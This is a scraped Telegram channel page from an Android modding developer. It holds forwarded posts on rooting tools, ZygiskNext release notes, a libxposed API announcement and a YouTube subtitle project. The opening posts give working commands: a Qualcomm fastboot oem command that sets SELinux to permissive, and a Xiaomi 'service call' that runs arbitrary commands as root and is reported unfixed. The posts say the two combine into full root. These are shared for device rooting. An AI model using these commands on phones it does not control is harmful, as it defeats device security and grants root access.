Real Nullptr
18K subscribers
6 photos
52 files
37 links
Nullptr's personal channel

Support me:
https://github.com/sponsors/Dr-TSNG
TRC20:TYG2MCMcXWsko9DZkVXjX3P1Xv7dhNAarx
Download Telegram
Forwarded from 南宫雪珊
fastboot oem set-gpu-preemption-value 0 androidboot.selinux=permissive

service call miui.mqsas.IMQSNative 21 i32 1 s16 "命令" i32 1 s16 "参数列表" s16 '输出路径' i32 600

第一个漏洞可以关闭SELinux强制执行,高通限定,已修复;第二个漏洞以root身份执行任意命令,小米限定,未修复。组合后是完整root权限。
126🔥2🤡2
Forwarded from 南宫雪珊
南宫雪珊
fastboot oem set-gpu-preemption-value 0 androidboot.selinux=permissive service call miui.mqsas.IMQSNative 21 i32 1 s16 "命令" i32 1 s16 "参数列表" s16 '输出路径' i32 600 第一个漏洞可以关闭SELinux强制执行,高通限定,已修复;第二个漏洞以root身份执行任意命令,小米限定,未修复。组合后是完整root权限。
第一个洞还有更多利用类型
fastboot oem set-hw-fence-value 0 androidboot.selinux=permissive

虽然已修复,但这是2022年引入的老漏洞了,应该适用于更多高通soc。
另外,对于selinux宽容的系统,即使不是小米,也可以利用隔离服务提权到root: https://github.com/vvb2060/Magica
63🤡3
libxposed API 101 已定稿。待模块开发者测试无误后,将发布到 MavenCentral。
稍后我们将发布兼容性单元测试工具供第三方实现参考。
参考开发文档:
https://libxposed.github.io/api/
https://libxposed.github.io/service/
相比 API 100 变更记录
392🤡22👍11🔥9🥰4👎1🫡1💊1
Forwarded from 5ec1cff (5ec1cff)
Zygisk-Next-1.3.3-731-1193e46-release.zip
5.4 MB
ZygiskNext 1.3.3 正式版
默认启用 ZN linker
适配 Android Canary 2603 的相关改动
提升对 nubia 系统、三星系统的兼容性
修复某些情况下与 magisk 的兼容性问题
修复其他小问题

ZygiskNext 1.3.3 Stable Release
Enable ZN linker by default
Adapt to changes in Android Canary 2603
Improve compatibility with certain nubia and Samsung systems
Fix compatibility issues with Magisk in some cases
Fix other minor issues

SHA256: a528584874dd814423dece1a6bc734aee524886d74f4453f48af0715a7f0f5c4

real5ec1cff | Github
2109👍18🥰12🤡4💊2👏1🍌1🤪1
Forwarded from 5ec1cff (5ec1cff)
Zygisk-Next-1.3.4-746-d1b76b3-release.zip
5.4 MB
ZygiskNext 1.3.4 正式版
修复使用某些模块导致崩溃的问题
WebUI 增加 ZN 模块列表
增加 Zygisk 模块错误检查机制,发现存在问题的模块会显示在 ZN 的模块状态和 WebUI 中(可检查的错误请参见文档
补充 1.3.3 的更新:ZN 模块的 inline hook 功能无需额外在 sepolicy 增加 execmem 规则


ZygiskNext 1.3.4 Stable Release
Fixed an issue that caused crashes when using certain modules.
Add ZN module list to the WebUI.
Add Zygisk module error checking mechanism. Modules with issues will be displayed in ZN's module status and WebUI (see the documentation for checkable errors).
Supplemented the 1.3.3 update: ZN module inline hook functionality no longer requires adding an execmem rule to sepolicy.

SHA256: b330b368e6133b83c069c0ff1bb1bf81091afec5a8d6532d39c14bd1b7e5d367

real5ec1cff | Github
3🔥6646👍11🥰4
Forwarded from 5ec1cff (5ec1cff)
Zygisk-Next-1.4.0-768-37ee2d5-release.zip
5.6 MB
ZygiskNext 1.4.0 正式版
ZN Linker 支持使用线程本地存储 (TLS) 的模块
修复一个崩溃问题
修复一个检测问题
调整 WebUI 模块列表对齐方式
更新 WebUI 翻译

ZygiskNext 1.4.0 Stable Release
ZN Linker now supports modules using Thread Local Storage (TLS)
Fixed a crash issue
Fixed a detection issue
Adjusted the alignment of the WebUI module list
Updated WebUI translations

SHA256: 97791423c705726478b95c2fb625af29f3899baff1a61e322f0977f0cb1141b1

real5ec1cff | Github
1🔥70👍1614😍3😢1
Forwarded from 5ec1cff (5ec1cff)
Zygisk-Next-1.4.1-780-9d7024c-release.zip
5.6 MB
ZygiskNext 1.4.1 正式版
解决 ZN Linker 与某些模块的兼容性问题(参见文档
解决与光速虚拟机的兼容性问题
WebUI 补充翻译
如果 zygisk 模块无法加载, WebUI 和模块状态会显示错误

ZygiskNext 1.4.1 Stable Release
Resolved compatibility issues between ZN Linker and certain modules (see documentation)
Resolved compatibility issues with VPhoneOS
Supplemented translation of WebUI
If zygisk modules fails to load, the WebUI and module status will display errors.

SHA256: 9bdc393f119c4b3bdad22701aeec04036ab4133e01453062e93a686922aa4a49

real5ec1cff | Github
43🥰7🔥6
Forwarded from 5ec1cff (5ec1cff)
Zygisk-Next-1.4.2-789-119aaa0-release.zip
6.7 MB
ZygiskNext 1.4.2 正式版
修复一个崩溃问题
修复与 Android 8 / 8.1 的兼容问题
WebUI 更新翻译

ZygiskNext 1.4.2 Stable Release
Fixed a crash issue
Fixed compatibility issues with Android 8/8.1
WebUI translation update

SHA256: 44f17aacfc3e40747811445a8f3f627aba195115de2f9bcf2e6ed909a993fbab

real5ec1cff | Github
52🔥6🥰6👍2🐳1
写了个新玩具,给 YouTube App 实现了沉浸式翻译双语字幕。自带的翻译做得一团糟,经常错位或消失,不得不自己动手搓了一个。

https://github.com/Dr-TSNG/PolyglotYT
121👍30🔥9🥰5🤩5
Forwarded from 5ec1cff (5ec1cff)
Zygisk-Next-1.4.3-817-e815170-release.zip
7 MB
ZygiskNext 1.4.3 正式版
增加模块崩溃检查,如果模块导致系统崩溃,会尝试找出导致问题的模块并显示在 WebUI 和模块描述中
增加导出 bugreport 功能,增加 action ,可通过 action 或 WebUI 导出并发送 bugreport
提升安全性
WebUI 支持 RTL 布局
更新 WebUI 翻译

ZygiskNext 1.4.3 Stable Release
Added module crash checking. If a module causes a system crash, it will attempt to find the problematic module and display it in the WebUI and module description.
Added bug report export functionality and action. Bug reports can be exported and sent via action or WebUI.
Improved security.
WebUI supports RTL layout.
Update WebUI translations.

SHA256: 82fb9176037771a9ed4f6a530581c7826460dbc19ca5a6908b95c60b86903858

real5ec1cff | Github
56👍15🥰52❤‍🔥1🔥1
今天有个Android开发者发信息给我说,这是她入行以来最好的夏天,这一年她找到了漏洞,把所有的手机都获取了root;内核到处利用,随便找个poc只要等一周的时间就够,前天在编译aosp,大群里突然所有人停下手头的事拥抱在一起欢呼,她说很开心,有种人类黄金时代的错觉。
😁19227👍11🔥4🥰2👏2🤔2🙏2🤩1🤡1